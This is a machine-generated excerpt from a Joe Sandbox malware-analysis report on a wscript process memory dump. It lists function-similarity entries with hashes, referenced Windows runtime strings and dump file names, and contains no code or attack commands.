                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                          • API String ID: 0-2474120054
                                                                                                          • Opcode ID: 6e3a62fc68015007dff79bec9006db07f7cccafc8b476c488cb151056b1286b9
                                                                                                          • Instruction ID: 5923a0859c15b032ba46a9181b5d8284529271aec47a9a115a8fb7304592018c
                                                                                                          • Opcode Fuzzy Hash: 6e3a62fc68015007dff79bec9006db07f7cccafc8b476c488cb151056b1286b9
                                                                                                          • Instruction Fuzzy Hash: F5E1AF316047419FD735CF28C884B2AB7E5BB88714F244A7DE8A58B2E1E7B4F945CB42
                                                                                                          Strings
                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04957B7F
                                                                                                          • RTL: Re-Waiting, xrefs: 04957BAC
                                                                                                          • RTL: Resource at %p, xrefs: 04957B8E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                          • API String ID: 0-871070163
                                                                                                          • Opcode ID: 57be9af7e9e82957ad22f344e364829605dee8227977f3456f15ccb89d5e423a
                                                                                                          • Instruction ID: 7cee8bfbaeb783b0a411d9013c898729daabec1e3acd4f7506c6504f31e8776b
                                                                                                          • Opcode Fuzzy Hash: 57be9af7e9e82957ad22f344e364829605dee8227977f3456f15ccb89d5e423a
                                                                                                          • Instruction Fuzzy Hash: E741B1317417069FD720DE25D840B6AB7EAEB88714F100A3DF95ADB7A0DB31F5058B91
                                                                                                          APIs
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0495728C
                                                                                                          Strings
                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04957294
                                                                                                          • RTL: Re-Waiting, xrefs: 049572C1
                                                                                                          • RTL: Resource at %p, xrefs: 049572A3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                          • API String ID: 885266447-605551621
                                                                                                          • Opcode ID: 22a36d17815388df954efd4e2562063699fd6acff81e6ad1cc9218ff812ff58d
                                                                                                          • Instruction ID: d720c9362e78088ab37f9e0ed95197c60173e6e3d601cc4bdc406249e4456f44
                                                                                                          • Opcode Fuzzy Hash: 22a36d17815388df954efd4e2562063699fd6acff81e6ad1cc9218ff812ff58d
                                                                                                          • Instruction Fuzzy Hash: F541E131700206AFE720DE65DC41B66B7A6FB84714F204A39FD55EB690DB31F9028BD0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: %%%u$]:%u
                                                                                                          • API String ID: 48624451-3050659472
                                                                                                          • Opcode ID: cf39f8041f841c2cd7b44fc39f517dd814200ce692c745775f71d9ca96a19f5d
                                                                                                          • Instruction ID: be7c4afec9d755f4cb42eae3cfb5f2b1eec208b760b2ea68ed89edc6bb21621c
                                                                                                          • Opcode Fuzzy Hash: cf39f8041f841c2cd7b44fc39f517dd814200ce692c745775f71d9ca96a19f5d
                                                                                                          • Instruction Fuzzy Hash: 1E314576A00119AFDF20DF2DDC41BEE77E8EB54614F4449A5E849D3240EB30BE449FA1
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __aulldvrm
                                                                                                          • String ID: +$-
                                                                                                          • API String ID: 1302938615-2137968064
                                                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                          • Instruction ID: a51a8cfb6f58d6eb79ddfb19e58350315ec728e9090c7ae9367b5785fbf3c2f8
                                                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                          • Instruction Fuzzy Hash: A791E970E442369BDB24DE99CA816FEB7A9FF44320F14467AE815F72D8E730B9408760
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $$@
                                                                                                          • API String ID: 0-1194432280
                                                                                                          • Opcode ID: 9d1afe584bc6d6491c9654ff6abe716fdd056fc397dc9b0dedf0eb8707dd45fa
                                                                                                          • Instruction ID: c0055a966e1e1ce09f749e24d999c0e85f6fd65913078aa54e2888f233041708
                                                                                                          • Opcode Fuzzy Hash: 9d1afe584bc6d6491c9654ff6abe716fdd056fc397dc9b0dedf0eb8707dd45fa
                                                                                                          • Instruction Fuzzy Hash: B9812DB1D002699BDB31CB54CC44BEAB7B8AB49754F0046EAE919B7240E7746E80CFA0
                                                                                                          APIs
                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0496CFBD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CallFilterFunc@8
                                                                                                          • String ID: @$@4Cw@4Cw
                                                                                                          • API String ID: 4062629308-3101775584
                                                                                                          • Opcode ID: 30ee86308a69ac4b338084cc2fdf2e6c2509c844c7a5c7e6adf6aef4d19f6eac
                                                                                                          • Instruction ID: 5ccbf9e05162e1fba5d913909030bf5760b83cb0411262f47a21dbb4882082f1
                                                                                                          • Opcode Fuzzy Hash: 30ee86308a69ac4b338084cc2fdf2e6c2509c844c7a5c7e6adf6aef4d19f6eac
                                                                                                          • Instruction Fuzzy Hash: 5241A271A00218DFDB21DF99D940AADBBB8FF85B04F00863AE916DB254D774F841DB61